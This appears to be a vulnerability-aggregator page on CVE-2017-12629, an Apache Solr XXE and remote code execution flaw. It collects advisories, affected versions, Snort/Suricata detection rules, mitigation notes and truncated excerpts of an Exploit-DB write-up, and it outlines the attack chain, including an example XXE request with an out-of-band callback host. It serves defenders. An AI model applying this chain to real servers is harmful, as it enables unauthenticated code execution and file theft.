CVE-2017-12629
published 2017-10-14CVE-2017-12629: Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener…
PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOIT
Exploited in the wild
EPSS
91.90%
99.8th percentile
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | solr | 5.5.0 – 5.5.4 | — |
| apache | solr | 6.0.0 – 6.6.1 | — |
| apache | solr | 7.0.0 – 7.0.1 | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | lucene-solr | < lucene-solr 3.6.2+dfsg-11 (bookworm) | lucene-solr 3.6.2+dfsg-11 (bookworm) |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)"; flow:established,to_server; flowbits:isset,ET.CVE-2017-12629; http.method; content:"GET"; http.uri; content:"newcollection/config"; content:"|22|add-listener|22 3a|"; distance:0; content:"|22|event|22 3a 22|postCommit|22|"; distance:0; content:"|22|class|22|"; distance:0; content:"RunExecutableListener|22 2c 22|exe|22|"; distance:0; fast_pattern; content:"|22|dir|22|"; content:"|22|args|22|"; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024886; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
- →Detect XXE exploitation attempts by monitoring HTTP requests to Solr /select endpoints containing 'deftype=xmlparser' query parameter combined with DOCTYPE or ENTITY declarations in the 'q' parameter. ↗
- →Monitor for chained exploit: XXE request to /select endpoint followed by POST to /config with RunExecutableListener, then POST to /update to trigger postCommit event execution. ↗
- →Alert on Solr requests using the ftp:// wrapper in XXE payloads, which is used for Blind XXE to exfiltrate local files. ↗
- →Monitor for POST requests to /solr/<collection>/update with JSON body after a RunExecutableListener has been registered, as this triggers the postCommit event and executes the configured command. ↗
- →Use the Nuclei template detection logic: probe /solr/admin/cores?wt=json to enumerate collection names, then send XXE payload to /solr/<core>/select with deftype=xmlparser and an out-of-band callback URL.
- ·Elasticsearch is explicitly NOT vulnerable to this CVE despite using Lucene. ↗
- ·The RCE vector (RunExecutableListener via Config API) can be blocked by starting Solr with '-Ddisable.configEdit=true', which disallows Config API changes but does not fix the underlying XXE. ↗
- ·The XML Query Parser (deftype=xmlparser) is available by default on all query requests, meaning no authentication is required to trigger the XXE vector. ↗
- ·Red Hat JBoss Enterprise Application Platform 7 ships the vulnerable lucene-queryparser jar as a dependency; applications reusing it may be vulnerable to the XXE aspect only (not the RCE via Config API). ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Remote code execution occurs in Apache Solr
osv·2018-10-17
CVE-2017-12629 [CRITICAL] Remote code execution occurs in Apache Solr
Remote code execution occurs in Apache Solr
Remote code execution occurs in Apache Solr before versions 5.5.5, 6.6.2 and 7.1.0 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected vers
GHSA
Remote code execution occurs in Apache Solr
ghsa·2018-10-17
CVE-2017-12629 [CRITICAL] CWE-611 Remote code execution occurs in Apache Solr
Remote code execution occurs in Apache Solr
Remote code execution occurs in Apache Solr before versions 5.5.5, 6.6.2 and 7.1.0 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected vers
OSV
CVE-2017-12629: Remote code execution occurs in Apache Solr before 7
osv·2017-10-14·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629: Remote code execution occurs in Apache Solr before 7
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
Ubuntu
Apache Solr vulnerability
vendor_ubuntu·2020-01-29
CVE-2017-12629 Apache Solr vulnerability
Title: Apache Solr vulnerability
Summary: Apache Solr could be made to run programs if it received
specially crafted network traffic.
Michael Stepankin and Olga Barinova discovered that Apache Solr was
vulnerable to an XXE attack. An attacker could use this vulnerability to
remotely execute code.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
Solr: Code execution via entity expansion
vendor_redhat·2017-10-12·CVSS 9.8
CVE-2017-12629 [CRITICAL] CWE-138 Solr: Code execution via entity expansion
Solr: Code execution via entity expansion
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected vers
Debian
CVE-2017-12629: lucene-solr - Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before...
vendor_debian·2017·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629: lucene-solr - Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before...
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
Scope: local
bookworm: resolv
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 1)"; flow:established,to_server; flowbits:isset,ET.CVE-2017-12629; http.method; content:"GET"; http.uri; content:"newcollection/config"; content:"|22|add-listener|22 3a|"; distance:0; content:"|22|event|22 3a 22|postCommit|22|"; distance:0; content:"|22|class|22|"; distance:0; content:"RunExecutableListener|22 2c 22|exe|22|"; distance:0; fast_pattern; content:"|22|dir|22|"; content:"|22|args|22|"; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024886; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, d
Suricata
ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)
ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 XXE Exploit Attempt (URI)"; flow:established,to_server; flowbits:set,ET.CVE-2017-12629; http.uri; content:"?q=|7b 21|xmlparser"; content:"|3d 27 3c 21|DOCTYPE"; nocase; distance:0; fast_pattern; pcre:"/^(?:(?!\x0d\x0a).)+\x22(?:https?|file):\x2f\x2f/R"; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024885; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP GET 2)"; flow:established,to_server; flowbits:isset,ET.CVE-2017-12629; http.method; content:"GET"; http.uri; content:"?q="; content:"update?"; distance:0; content:"stream.body="; content:"commit="; content:"overwrite="; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024887; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_12629, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)
suricata·2017-10-20·CVSS 9.8
CVE-2017-12629 [CRITICAL] ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)
ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2017-12629 RCE Exploit Attempt (HTTP POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"newcollection/config"; http.request_body; content:"|22|add-listener|22|"; content:"|22|event|22 3a 22|postCommit|22|"; content:"|22|class|22|"; content:"RunExecutableListener|22 2c|"; fast_pattern; content:"|22|exe|22|"; content:"|22|dir|22|"; content:"|22|args|22|"; http.content_type; content:"application/json"; startswith; reference:url,www.exploit-db.com/exploits/43009/; classtype:web-application-attack; sid:2024884; rev:4; metadata:affected_product Apache_Solr, attack_target Web_Server, created_at 2017_10_20, cve CVE_2017_126
Exploit-DB
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
exploitdb·2017-10-17
CVE-2017-12629 Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
---
First Vulnerability: XML External Entity Expansion (deftype=xmlparser)
Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query.
The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):
Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v=''}
When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and tr
Nuclei
Apache Solr <= 7.1 - XML Entity Injection
nuclei·CVSS 9.8
CVE-2017-12629 [CRITICAL] Apache Solr <= 7.1 - XML Entity Injection
Apache Solr <= 7.1 - XML Entity Injection
Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected version
Bugzilla
CVE-2017-12629 lucene: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene: Solr: Code execution via entity expansion [fedora-all]
CVE-2017-12629 lucene: Solr: Code execution via entity expansion [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions
Bugzilla
CVE-2017-12629 lucene3: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene3: Solr: Code execution via entity expansion [fedora-all]
CVE-2017-12629 lucene3: Solr: Code execution via entity expansion [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported version
Bugzilla
CVE-2017-12629 solr3: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 solr3: Solr: Code execution via entity expansion [fedora-all]
CVE-2017-12629 solr3: Solr: Code execution via entity expansion [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions
Bugzilla
CVE-2017-12629 lucene4: Solr: Code execution via entity expansion [fedora-all]
bugzilla·2017-10-13·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 lucene4: Solr: Code execution via entity expansion [fedora-all]
CVE-2017-12629 lucene4: Solr: Code execution via entity expansion [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported version
Bugzilla
CVE-2017-12629 Solr: Code execution via entity expansion
bugzilla·2017-10-12·CVSS 9.8
CVE-2017-12629 [CRITICAL] CVE-2017-12629 Solr: Code execution via entity expansion
CVE-2017-12629 Solr: Code execution via entity expansion
It was found that Apache Solr would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code on the server.
Discussion:
Satellite 6.2 and later do not ship lucene so are not vulnerable to this. Satellite 6.0 and 6.1 ship lucene v.4 which is not vulnerable to this issue.
SAM 1.x ships an old version of lucene (v.3) that is not vulnerable to this issue, additionally the affected class does not appear to be used.
---
Mitigation:
Until fixes are available, all Solr users are advised to restart their Solr instances with the system parameter `-Ddisable.configEdit=true`. This will disallo
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3Ehttp://openwall.com/lists/oss-security/2017/10/13/1http://www.securityfocus.com/bid/101261https://access.redhat.com/errata/RHSA-2017:3123https://access.redhat.com/errata/RHSA-2017:3124https://access.redhat.com/errata/RHSA-2017:3244https://access.redhat.com/errata/RHSA-2017:3451https://access.redhat.com/errata/RHSA-2017:3452https://access.redhat.com/errata/RHSA-2018:0002https://access.redhat.com/errata/RHSA-2018:0003https://access.redhat.com/errata/RHSA-2018:0004https://access.redhat.com/errata/RHSA-2018:0005https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r26c996b068ef6c5e89aa59acb769025cfd343a08e63fbe9e7f3f720f%40%3Coak-issues.jackrabbit.apache.org%3Ehttps://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3Ehttps://lists.debian.org/debian-lts-announce/2018/01/msg00028.htmlhttps://s.apache.org/FJDlhttps://twitter.com/ApacheSolr/status/918731485611401216https://twitter.com/joshbressers/status/919258716297420802https://twitter.com/searchtools_avi/status/918904813613543424https://usn.ubuntu.com/4259-1/https://www.debian.org/security/2018/dsa-4124https://www.exploit-db.com/exploits/43009/http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3Ehttp://openwall.com/lists/oss-security/2017/10/13/1http://www.securityfocus.com/bid/101261https://access.redhat.com/errata/RHSA-2017:3123https://access.redhat.com/errata/RHSA-2017:3124https://access.redhat.com/errata/RHSA-2017:3244https://access.redhat.com/errata/RHSA-2017:3451https://access.redhat.com/errata/RHSA-2017:3452https://access.redhat.com/errata/RHSA-2018:0002https://access.redhat.com/errata/RHSA-2018:0003https://access.redhat.com/errata/RHSA-2018:0004https://access.redhat.com/errata/RHSA-2018:0005https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r26c996b068ef6c5e89aa59acb769025cfd343a08e63fbe9e7f3f720f%40%3Coak-issues.jackrabbit.apache.org%3Ehttps://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3Ehttps://lists.debian.org/debian-lts-announce/2018/01/msg00028.htmlhttps://s.apache.org/FJDlhttps://twitter.com/ApacheSolr/status/918731485611401216https://twitter.com/joshbressers/status/919258716297420802https://twitter.com/searchtools_avi/status/918904813613543424https://usn.ubuntu.com/4259-1/https://www.debian.org/security/2018/dsa-4124https://www.exploit-db.com/exploits/43009/
2017-10-14
Published
Exploited in the wild